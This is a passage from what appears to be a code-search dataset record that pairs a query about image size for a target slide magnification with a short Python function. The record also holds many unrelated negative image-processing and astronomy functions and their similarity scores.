find_brightest_biggest(filename, catname=\"sources.cat\", config=\"config.sex\", minsize=10,\n minflux=450000):\n # Get dimensions of the image\n hdulist = pf.open(filename)\n (height, width) = hdulist[0].data.shape\n bloblist = manual_blob_finder(hdulist[0].data)\n hdulist.close()\n\n if bloblist is None:\n return None\n\n sort_ind = np.argsort(bloblist['max'])[::-1]\n blob_ind = None\n for ind in sort_ind:\n if bloblist['width'][ind] >= minsize and bloblist['flux'][ind] > minflux:\n blob_ind = ind\n break\n\n if blob_ind is None:\n return None\n\n return (bloblist['cent_x'][blob_ind] - (float(width) / 2.),\n bloblist['cent_y'][blob_ind] - (float(height) / 2.),\n bloblist['flux'][blob_ind],\n bloblist['width'][blob_ind],\n bloblist['max'][blob_ind])\n\n '''\n # Use sextractor to find blobs.\n # N.B. 
may be tuning of parameters, but this was mostly unreliable and noisy.\n\n hdulist.close()\n\n # Source extract\n call([\"sextractor\", filename, \"-c\", config, \"-CATALOG_NAME\", catname])\n\n # Load the catalog file\n srclist = pf.open(catname)\n srctable = srclist[2].data\n sort_ind = np.argsort(srctable['FLUX_MAX'])[::-1]\n blob_ind = None\n for ind in sort_ind:\n if (srctable['FLUX_RADIUS'][ind] > minsize and srctable['FLUX_MAX'][ind] > minflux and\n srctable['FLUX_RADIUS'][ind] < maxradius and srctable['FLUX_MAX'][ind] < maxflux):\n blob_ind = ind;\n break\n if blob_ind is None:\n return None\n return (srctable['X_IMAGE'][blob_ind] - (float(width) / 2.), \n srctable['Y_IMAGE'][blob_ind] - (float(height) / 2.),\n srctable['FLUX_MAX'][blob_ind],\n srctable['FLUX_RADIUS'][blob_ind],\n srctable['SNR_WIN'][blob_ind])\n '''", "def largestResolution(resolutions):\n return resolutions[0]", "def getMaxMancount(self):\n return self.__size * 20", "def calc_image_size(spr):\n return int(max(spr.label_safe_width(), 1)), \\\n int(max(spr.label_safe_height(), 1))", "def get_height():\n return resize.transforms[1].size", "def peak_height(self):\n return np.array([max(self.waveform[ch]) for ch in range(self.nchannels)])", "def img_scale(self):\n return min(400, abs(self.size))", "def getScaledDimensions(size, max_size, returnFactor=False):\n\n width, height = size\n max_width, max_height = max_size\n if (max_width, max_height) == (0, 0) or (width, height) == (0, 0): return (0, 0)\n wfactor, hfactor = 1.0, 1.0\n\n if width > max_width: wfactor = float(max_width) / width\n if height > max_height: hfactor = float(max_height) / height\n\n factor = min(wfactor, hfactor)\n\n size = (width * factor, height * factor)\n\n if not returnFactor:\n return size\n else:\n return size, factor", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def max_obj_dets_per_img(self):\n return min(64, self._annos_per_img[self.dataset]['max_objects'])", "def get_max_rois(self):\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize", "def get_image_size(frame) -> tuple:\n return tuple(frame.shape[1::-1])", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def _get_max_estimated_bandit(self)->Bandit:\n # print(\"mus - \", self.mu)\n # print(\"actions - \", np.argmax(self.mu))\n unique, counts = np.unique(self.mu, return_counts=True)\n lens = counts[np.argmax(unique)] \n if lens>1: # if two actions have same argmax\n # then return arbitrarily from those max ones\n maxs = list(np.array(self.bandits)[self.mu==unique[np.argmax(unique)]])\n return np.random.choice(maxs)\n # otherwise return the max one\n return self.bandits[np.argmax(self.mu)]", "def sort_maxside(sprite):\n return max(sprite.width, sprite.height)", "def get_size(img):\n ih, iw = img.shape[:2]\n return iw * ih", "def get_height_of_signal_maximum(\n data, setup={}, varname=None, gate_min=None, gate_max=None):\n idx = get_index_of_signal_maximum(\n data, setup, varname, gate_min, gate_max)\n nt = range(len(idx))\n return data['alt'][nt, idx]", "def get_large_from_thumbnail(url):\n a = annotate(url)\n if not a:\n return\n r = return_large(a)\n\n # If there are no large equivalents, return None\n if not r:\n return None\n return r", "def find_maximum_patch_size(model, device):\n logger = get_logger('PatchFinder')\n in_channels = 
model.in_channels\n\n patch_shapes = [(64, 128, 128), (96, 128, 128),\n (64, 160, 160), (96, 160, 160),\n (64, 192, 192), (96, 192, 192)]\n\n for shape in patch_shapes:\n # generate random patch of a given size\n patch = np.random.randn(*shape).astype('float32')\n\n patch = torch \\\n .from_numpy(patch) \\\n .view((1, in_channels) + patch.shape) \\\n .to(device)\n\n logger.info(\"Current patch size: {shape}\")\n model(patch)", "def get_max_density(self):\n max_density = str(self.density.index(min(self.density)) + 1)\n print(max_density)\n return max_density", "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def calculate_max_height_width(imgs):\n h_w_map = np.zeros((len(imgs), 2), dtype=np.int32)\n for index, img in enumerate(imgs):\n h_w_map[index, 0], h_w_map[index, 1], _ = img.shape\n max_val = h_w_map.argmax(axis=0)\n max_height, max_width = h_w_map[max_val[0], 0], h_w_map[max_val[1], 1]\n return max_height, max_width", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF2IF2_GetSizeGreatestPrimeFactor(self)", "def find_maximum_patch_size(model, device):\n logger = get_logger('PatchFinder')\n in_channels = model.in_channels\n\n patch_shapes = [(64, 128, 128), (96, 128, 128),\n (64, 160, 160), (96, 160, 160),\n (64, 192, 192), (96, 192, 192)]\n\n for shape in patch_shapes:\n # generate random patch of a given size\n patch = np.random.randn(*shape).astype('float32')\n\n patch = torch \\\n .from_numpy(patch) \\\n .view((1, in_channels) + patch.shape) \\\n .to(device)\n\n logger.info(f\"Current patch size: {shape}\")\n model(patch)", "def image_size():\n return eval(subprocess(\"print camera_image_size()\"))", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def mag(q):\n magnitude = np.sqrt((q[0,0]**2)+(q[0,1]**2)+(q[0,2]**2)+(q[0,3]**2))\n return magnitude", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def calc_thumbnail_size(img):\n width, length = img.size\n ratio = width / length\n\n # for some reason, if it's exactly 224, then thumnailed image is 223\n dim = 224 + 1 # output dim\n if ratio > 1:\n size = (dim * ratio, dim)\n else:\n size = (dim, dim / ratio)\n# print(size)\n return size", "def maxfit(self, *args, **kwargs):\n return _image.image_maxfit(self, *args, **kwargs)", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def quickMinMax(self, targetSize=1e6):\n data = self.image\n if targetSize < 2: # keep at least two pixels\n targetSize = 2\n while True:\n h, w = data.shape[:2]\n if h * w <= targetSize: break\n if h > w:\n data = data[::2, ::] # downsample first axis\n else:\n data = data[::, ::2] # downsample second axis\n return self._xp.nanmin(data), self._xp.nanmax(data)", "def imageScale(scale):\n\t\treturn max(1, int(scale * (InterfaceTools.getCanvasSize()[0] / height)))", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n 
highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def get_thumbnail_size(self, thumbnail_name, forced=False):", "def maxSize(image, maxSize, method=3):\n imAspect = float(image.size[0]) / float(image.size[1])\n outAspect = float(maxSize[0] / float(maxSize[1]))\n\n if imAspect >= outAspect:\n return image.resize(\n (maxSize[0], int((float(maxSize[0]) / imAspect) + 0.5)), method\n )\n else:\n return image.resize(\n (int((float(maxSize[1]) * imAspect) + 0.5), maxSize[1]), method\n )", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF3IF3_GetSizeGreatestPrimeFactor(self)", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def find_shower_max_height(self, energy, h_first_int, gamma_alt):\n\n # offset of the shower-maximum in radiation lengths\n c = 0.97 * log(energy / (83 * u.MeV)) - 1.32\n # radiation length in dry air at 1 atm = 36,62 g / cm**2 [PDG]\n c *= 36.62 * u.g * u.cm ** -2\n # showers with a more horizontal direction spend more path\n # length in each atm. 
layer the \"effective transverse\n # thickness\" they have to pass is reduced\n c *= np.sin(gamma_alt)\n\n # find the thickness at the height of the first interaction\n t_first_int = self.thickness_profile(h_first_int)\n\n # total thickness at shower maximum = thickness at first\n # interaction + thickness traversed to shower maximum\n t_shower_max = t_first_int + c\n\n # now find the height with the wanted thickness by solving for the\n # desired thickness\n return self.altitude_profile(t_shower_max)", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def img_extent(img):\n# get the image coordinates in pixels\n px0 = img.meta['crpix1']\n py0 = img.meta['crpix2']\n# get the image coordinates in arcsec \n ax0 = img.meta['crval1']\n ay0 = img.meta['crval2']\n# get the image scale in arcsec \n axd = img.meta['cdelt1']\n ayd = img.meta['cdelt2']\n#get the number of pixels\n tx,ty = img.data.shape\n#get the max and min x and y values\n minx,maxx = px0-tx,tx-px0\n miny,maxy = py0-ty,ty-py0\n#convert to arcsec\n maxx,minx = maxx*axd,minx*axd\n maxy,miny = maxy*ayd,miny*ayd\n\n\n return maxx,minx,maxy,miny", "def _maxAlien(self):\n maxA = 0\n for r in self._aliens:\n for y in r:\n if(y != None):\n maxA = max(maxA,y.x)\n return maxA", "def extractPeak( image, nSizeX, nSizeY, nMaxSize, nMaxNbr = 5, nErrorValue = -1 ):\n blobs = []; # will contain the center of the blob and it's max value\n nSmallerMax = 0; # the max value of the smallest peak\n nSmallerIdx = -1;\n nMaxSizeSquared = nMaxSize*nMaxSize;\n for y in range( nSizeY ):\n for x in range( nSizeX ):\n# print( \"x,y: %d,%d\" % (x,y) );\n nVal = image[x+y*nSizeX];\n if( nVal != nErrorValue ):\n if( nVal > nSmallerMax ):\n # update blobs\n # find in blobs\n bFound = False; \n bUpdateSmallerMax = False;\n n = 0;\n while( n < len( blobs ) ):\n if( distSquared( blobs[n][0], blobs[n][1], x, y ) < nMaxSizeSquared ):\n # found it!\n if( nVal > blobs[n][2] ):\n # update this blobs\n blobs[n][0] = x;\n blobs[n][1] = y;\n blobs[n][2] = nVal;\n if( nSmallerMax == nVal ):\n # update smaller max\n bUpdateSmallerMax = True;\n bFound = True;\n break;\n n += 1;\n if( not bFound ):\n # create a new one\n if( len( blobs ) < nMaxNbr ):\n # create from scratch\n blobs.append( [x,y,nVal] );\n bUpdateSmallerMax = True;\n else:\n # reuse smaller\n blobs[nSmallerIdx][0] = x;\n blobs[nSmallerIdx][1] = y;\n blobs[nSmallerIdx][2] = nVal;\n bUpdateSmallerMax = True;\n \n if( bUpdateSmallerMax ):\n nSmallerMax = 0xFFFFFFF;\n for idx, blob in enumerate( blobs ):\n if( blob[2] < nSmallerMax ):\n nSmallerMax = blob[2];\n nSmallerIdx = idx;\n# print( \"blobs: %s\" % str( blobs ) );\n # if( nVal > nSmallerMax ) - end\n # if( nVal != nErrorValue ) - end\n \n # convert to fixed size\n for idx, blob in enumerate( blobs ):\n blobs[idx].append( 50-idx*10 );\n\n return blobs;", "def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])", "def size_from_name(size, sizes):\n\n by_name = [s for s in sizes if s.name == size]\n if len(by_name) > 1:\n raise Exception('more than one image named %s exists' % size)\n return by_name[0]", "def _get_max_image_bytes(self):\n raise NotImplementedError(\"Abstract method not implemented\")", "def downScaleResolution(kv, factor=10):\n sub_img_name = kv[0]\n sub_image = kv[1]\n img_dimension = len(sub_image)\n big_image = sub_image\n Nbig = img_dimension\n Nsmall = Nbig//factor\n small_image = big_image.reshape([Nsmall, Nbig // Nsmall, Nsmall, Nbig // Nsmall]).mean(3).mean(1)\n return (sub_img_name,small_image)", "def 
_SizeCalculator(partition_size):\n # Minus footer size to return max image size.\n return partition_size - int(math.pow(partition_size, 0.95))", "def get_size(image):\n width, height = image.size\n\n return (width, height)", "def find_suggested_tonemap_scale(session):\n avg_film_luminance = session.GetFilm().GetFilmY()\n return (1.25 / avg_film_luminance * (118 / 255))\n\n # TODO\n # measure this all the time, show a message to the user if\n # abs(old - new) > threshold\n # so the user can set the new value with one click\n\n # imagepipeline = scene.camera.data.luxcore.imagepipeline\n # imagepipeline.tonemapper.linear_scale = suggested_linear_scale\n # imagepipeline.tonemapper.use_autolinear = False", "def get_max_min(block_size):\r\n return (int(block_size / 2), int((block_size - 1) / 2))", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def max_min_kmer_sizes(filename):\n try:\n fh = gzip.open if isgzip(filename) else open\n with fh(filename, 'rt') as f:\n kmer_sizes = np.array([len(rec.split()[0]) for rec in f])\n\n return kmer_sizes.min(), kmer_sizes.max()\n\n except Exception:\n print('Not able to read file [%s]\\n' % filename)\n raise", "def size(img):\n\treturn img.size", "def density_maxima(self, samplesize=5, thresh_mod=0):\r\n filtered = ndimage.maximum_filter(self.data, size=(samplesize, samplesize, samplesize), mode=\"wrap\")\r\n\r\n threshold = filtered.mean() + thresh_mod\r\n print(f\"actual threhold value: {threshold:.2f}\")\r\n labels, num_labels = ndimage.label(filtered > threshold)\r\n\r\n # Coordinates of maxima\r\n pos = np.array(ndimage.measurements.center_of_mass(np.asarray(self.data), labels=labels,\r\n index=np.arange(1, num_labels + 1)))\r\n\r\n # Values of maxima\r\n val = np.array(ndimage.measurements.maximum(self.data, labels=labels, index=np.arange(1, num_labels + 1)))\r\n\r\n pos[:, 0] *= iCube.x[0]\r\n pos[:, 1] *= iCube.y[1]\r\n pos[:, 2] *= iCube.z[2]\r\n\r\n return pos, val", "def get_max_point(image):\r\n max_value= 0\r\n better_point= None\r\n for line in range(len(image)):\r\n for column in range(len(image[0])):\r\n if image[line][column]>max_value:\r\n max_value= image[line][column]\r\n better_point = [line,column]\r\n return better_point", "def resizeImage(image, maxW, maxH):\n\timageW, imageH = image.size\n\tif imageW == maxW and imageH == maxH:\n\t\treturn image\n\t# find which axis requires the biggest zoom (smallest relative max dimension)\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\tzoom = max(zoomW, zoomH)\n\tif zoomW >= zoomH:\t# size is defined by width\n\t\tmaxH = int(imageH//zoom)\t# calculate the new height\n\telse:\n\t\tmaxW = int(imageW//zoom)\n\treturn image.resize((maxW, maxH))", "def output_image_size(n_patches_x, n_patches_y, patch_size):\n width = n_patches_x * patch_size\n height = n_patches_y * patch_size\n return width, height", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, keepdims=True))", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def _get_image_size(self):\n return (3, 224, 224)", "def magnitude_ratio(magnitudes):\n median = np.median(magnitudes)\n\n points_above_median = magnitudes[magnitudes > median].size\n\n return points_above_median / magnitudes.size", "def compute_resolution(zoom, size_px):\n # Calibration data:\n dist_in_um = 10\n dist_in_px = np.array([21.13, 19.62, 8.93])\n zooms = np.array([1.5, 3, 4.5])\n image_max_sizes = np.array([330, 610, 410])\n \n 
return np.mean((dist_in_um/dist_in_px) * (zoom/zooms) * (image_max_sizes/size_px))" ]
[ "0.7177108", "0.71568376", "0.6950366", "0.67886364", "0.6724605", "0.65802383", "0.62866354", "0.6198589", "0.60788", "0.60172695", "0.599912", "0.5912535", "0.5909752", "0.5874121", "0.5848604", "0.58275664", "0.5797984", "0.5797821", "0.57959604", "0.57886523", "0.5763161", "0.56523824", "0.5649488", "0.56480813", "0.5642267", "0.5629", "0.56090206", "0.55947185", "0.5585838", "0.55747986", "0.55747986", "0.5572482", "0.5566037", "0.55623645", "0.5559744", "0.55422705", "0.5530884", "0.55151796", "0.5513619", "0.55080974", "0.54986167", "0.5493552", "0.54880935", "0.5484176", "0.5477793", "0.5446075", "0.54431546", "0.54420954", "0.54399216", "0.5439287", "0.54308695", "0.5421762", "0.54194254", "0.541857", "0.54110783", "0.5410925", "0.5409924", "0.54087454", "0.5385484", "0.53811336", "0.53771275", "0.5376934", "0.53662807", "0.5360905", "0.53575027", "0.53373563", "0.5333989", "0.5309991", "0.53051704", "0.53025174", "0.5301956", "0.5296521", "0.52930796", "0.5282824", "0.52782375", "0.5277039", "0.5269215", "0.5267064", "0.52658653", "0.525369", "0.5252502", "0.5252395", "0.52521735", "0.52504617", "0.52434176", "0.5242736", "0.52386385", "0.5237124", "0.5235637", "0.523377", "0.5232412", "0.52323717", "0.52303815", "0.5230072", "0.52296305", "0.52140343", "0.5211529", "0.52107555", "0.52028465", "0.52006763" ]
0.7147567
2
Get the image size that the highest magnification image would have to be resized to in order to get an equivalent magnification
def get_size_for_mag(slide, mag):
    max_size = slide.dimensions
    max_mag = highest_mag(slide)
    downsample = max_mag/mag
    return [np.int(np.round(dim/downsample)) for dim in max_size]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def get_image_size(self):", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def _image_resolution(image_filename):\n img = mpimg.imread(image_filename)\n return img.shape", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def image_size(size):\n l_max = max(size)\n if l_max > 300:\n num = l_max/300\n else:\n num = 1\n w = round(size[0] / num)\n h = round(size[1] / num)\n new_size = [w, h]\n return new_size", "def img_scale(self):\n return min(400, abs(self.size))", "def size(img):\n\treturn img.size", "def calc_image_size(spr):\n return int(max(spr.label_safe_width(), 1)), \\\n int(max(spr.label_safe_height(), 1))", "def get_size(img):\n ih, iw = img.shape[:2]\n return iw * ih", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def get_new_img_size(w, h, img_min_side = 600):\n if w <= h:\n f = float(img_min_side) / w\n resized_h = int(f * h)\n resized_w = img_min_side\n else:\n f = float(img_min_side) / h\n resized_w = int(f * w)\n resized_h = img_min_side\n \n return resized_w, resized_h", "def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale", "def _get_extended_image_size(height, width, patch_size, stride):\n\n ext_height, ext_width = 0, 0\n\n def sliding_distance(n_windows, window_size, stride):\n return window_size * n_windows - (window_size - stride) * (n_windows - 1)\n\n if height < patch_size:\n ext_height = patch_size\n else:\n for n in range(height):\n distance = sliding_distance(n, patch_size, stride)\n if distance > height:\n ext_height = distance\n break\n\n if width < patch_size:\n ext_width = patch_size\n else:\n for n in range(width):\n distance = sliding_distance(n, patch_size, stride)\n if distance > width:\n ext_width = distance\n break\n\n return ext_height, ext_width", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def getScaledDimensions(size, max_size, returnFactor=False):\n\n width, height = size\n max_width, max_height = max_size\n if (max_width, max_height) == (0, 0) or (width, height) == (0, 0): return (0, 0)\n wfactor, hfactor = 1.0, 1.0\n\n if width > max_width: wfactor = float(max_width) / width\n if height > max_height: hfactor = float(max_height) / height\n\n factor = min(wfactor, hfactor)\n\n size = (width * factor, height * factor)\n\n if not returnFactor:\n return size\n else:\n return size, factor", "def get_height():\n return resize.transforms[1].size", "def GetBestSize(self):\n bmp = self._bitmap\n return wx.Size(bmp.GetWidth(), bmp.GetHeight())", "def get_resize_to(image, size_x, size_y):\n scale_x = image.shape[0] // size_x\n scale_y = image.shape[1] // size_y\n 
if scale_x == 0 or scale_y == 0:\n return 3, None\n if image.shape[0] % scale_x != 0 or image.shape[1] % scale_y != 0:\n return 1, None\n if image.shape[0] < scale_x or image.shape[1] < scale_y:\n return 2, None\n\n arrays = []\n for i in range(scale_x):\n for j in range(scale_y):\n arrays.append(image[i::scale_x, j::scale_y])\n\n result = mode(np.stack(arrays), axis=0).mode[0]\n if result.max() > 10:\n print(1)\n\n return 0, result", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def get_image_size(self, **kwargs):\n fov_height = np.abs(self.fov_pitch[1] - self.fov_pitch[0])\n fov_width = np.abs(self.fov_yaw[1] - self.fov_yaw[0])\n height = np.ceil(fov_height * self.res_pitch).astype(int)\n width = np.ceil(fov_width * self.res_yaw).astype(int)\n\n return height, width", "def _SizeCalculator(partition_size):\n # Minus footer size to return max image size.\n return partition_size - int(math.pow(partition_size, 0.95))", "def get_image_size(frame) -> tuple:\n return tuple(frame.shape[1::-1])", "def calc_thumbnail_size(img):\n width, length = img.size\n ratio = width / length\n\n # for some reason, if it's exactly 224, then thumnailed image is 223\n dim = 224 + 1 # output dim\n if ratio > 1:\n size = (dim * ratio, dim)\n else:\n size = (dim, dim / ratio)\n# print(size)\n return size", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def _get_image_size(self):\n return (3, 224, 224)", "def resizeImage(image, maxW, maxH):\n\timageW, imageH = image.size\n\tif imageW == maxW and imageH == maxH:\n\t\treturn image\n\t# find which axis requires the biggest zoom (smallest relative max dimension)\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\tzoom = max(zoomW, zoomH)\n\tif zoomW >= zoomH:\t# size is defined by width\n\t\tmaxH = int(imageH//zoom)\t# calculate the new height\n\telse:\n\t\tmaxW = int(imageW//zoom)\n\treturn image.resize((maxW, maxH))", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF2IF2_GetSizeGreatestPrimeFactor(self)", "def recommended_size(img_shape):\r\n new_width = 512\r\n new_height = img_shape[0] / img_shape[1] * 512\r\n new_height = round(new_height / 32) * 32\r\n return new_width, new_height", "def format_img_size(self, img, C):\n img_min_side = float(C.im_size)\n (height,width,_) = img.shape\n\n if width <= height:\n ratio = img_min_side/width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side/height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def get_size(image):\n width, height = image.size\n\n return (width, height)", "def get_image_size(file_name):\r\n return Image.open(file_name).size", "def image_size(cls):\n return random.randint(250000, 80000000000)", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def min_image_length(self):\n\n # Will contain the minimum number of super pixels on return.\n px = ct.c_int()\n self.lib.GetMinimumImageLength(ct.pointer(px))\n\n return px.value", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return 
_itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF3IF3_GetSizeGreatestPrimeFactor(self)", "def format_img_size(img, C):\n img_min_side = float(C.im_size)\n (height, width, _) = img.shape\n\n if width <= height:\n ratio = img_min_side / width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side / height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def format_img_size(img, C):\n img_min_side = float(C.im_size)\n (height, width, _) = img.shape\n\n if width <= height:\n ratio = img_min_side / width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side / height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def camera_image_size():\n camera = GigE_camera(parameter(\"camera.IP_addr\"))\n width,height = camera.width,camera.height\n orientation = parameter('Orientation',90) # in degrees counter-clockwise\n if orientation == None: orienation = 0\n orientation %= 360\n if orientation == 90 or orientation == 270: width,height = height,width\n return width,height", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def recommended_size(img_shape):\n new_width = 512\n new_height = img_shape[0] / img_shape[1] * 512\n new_height = round(new_height / 32) * 32\n return new_width, int(new_height)", "def get_size(self, index):\n return self.image_sizes[index]", "def pix_size(self):\n return self._pix_size", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def output_image_size(n_patches_x, n_patches_y, patch_size):\n width = n_patches_x * patch_size\n height = n_patches_y * patch_size\n return width, height", "def get_image_size(image_name='default.png'):\n\timg = Image.open(image_name)\n\treturn (img.width, img.height)", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def minimum_size(self):\n return self.fwhm*2.", "def get_scaling_ratio(img):\n\n healthy_img_area = 4872 * 6496\n input_img_area = img.shape[0] * img.shape[1]\n ratio = input_img_area / healthy_img_area\n return ratio", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def _get_box_sizes(self, image_info, cat):\n\n\n file_id=0\n impath=image_info['image_path'][file_id].strip()\n ext=image_info['image_ext'][file_id]\n wcs_data = fitsio.read_header(impath, ext=ext)\n wcs = eu.wcsutil.WCS(wcs_data)\n\n\n jacob = wcs.get_jacobian(100,100)\n dudcol, dudrow, dvdcol, dvdrow = jacob\n\n det = dvdrow*dudcol - dvdcol*dudrow\n pixel_scale = np.sqrt(abs(det))\n print('found pixel scale:',pixel_scale)\n box_size = cat['box_size_arcsec']/pixel_scale\n\n # clip to range\n box_size.clip(\n min=self['min_box_size'],\n max=self['max_box_size'],\n out=box_size,\n )\n box_size = box_size.astype('i4')\n\n w,=np.where( ( (box_size % 2) != 0 ) )\n if w.size > 0:\n box_size[w] += 1\n\n return box_size", "def size(self):\n return self._image_size", "def imageScale(scale):\n\t\treturn max(1, int(scale * (InterfaceTools.getCanvasSize()[0] / height)))", "def _SizeCalculator(partition_size):\n # Max image size grows less than partition 
size, which means\n # footer size grows faster than partition size.\n return int(math.pow(partition_size, 0.95))", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def get_spatial_image_size(image_resizer_config):\n if image_resizer_config.HasField(\"fixed_shape_resizer\"):\n return [\n image_resizer_config.fixed_shape_resizer.height,\n image_resizer_config.fixed_shape_resizer.width\n ]\n if image_resizer_config.HasField(\"keep_aspect_ratio_resizer\"):\n if image_resizer_config.keep_aspect_ratio_resizer.pad_to_max_dimension:\n return [image_resizer_config.keep_aspect_ratio_resizer.max_dimension] * 2\n else:\n return [-1, -1]\n if image_resizer_config.HasField(\n \"identity_resizer\") or image_resizer_config.HasField(\n \"conditional_shape_resizer\"):\n return [-1, -1]\n raise ValueError(\"Unknown image resizer type.\")", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def CalculateMaxImageSize(self, partition_size):\n raise NotImplementedError", "def get_erode_size(self, obj_size):\n max_size = np.sqrt(obj_size[0]**2 + obj_size[1]**2)\n erode_size = int(np.round(max_size / self.pix_size))\n return erode_size", "def get_max_rois(self):\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize", "def get_thumbnail_size(self, thumbnail_name, forced=False):", "def _get_max_image_bytes(self):\n raise NotImplementedError(\"Abstract method not implemented\")", "def calculate_max_height_width(imgs):\n h_w_map = np.zeros((len(imgs), 2), dtype=np.int32)\n for index, img in enumerate(imgs):\n h_w_map[index, 0], h_w_map[index, 1], _ = img.shape\n max_val = h_w_map.argmax(axis=0)\n max_height, max_width = h_w_map[max_val[0], 0], h_w_map[max_val[1], 1]\n return max_height, max_width", "def _resize(img, max_dim=128):\n if max(img.shape[:3]) <= max_dim:\n return img\n else:\n new_size = [max_dim / s if s >= max_dim else 1.0 for s in img.shape[:3]]\n 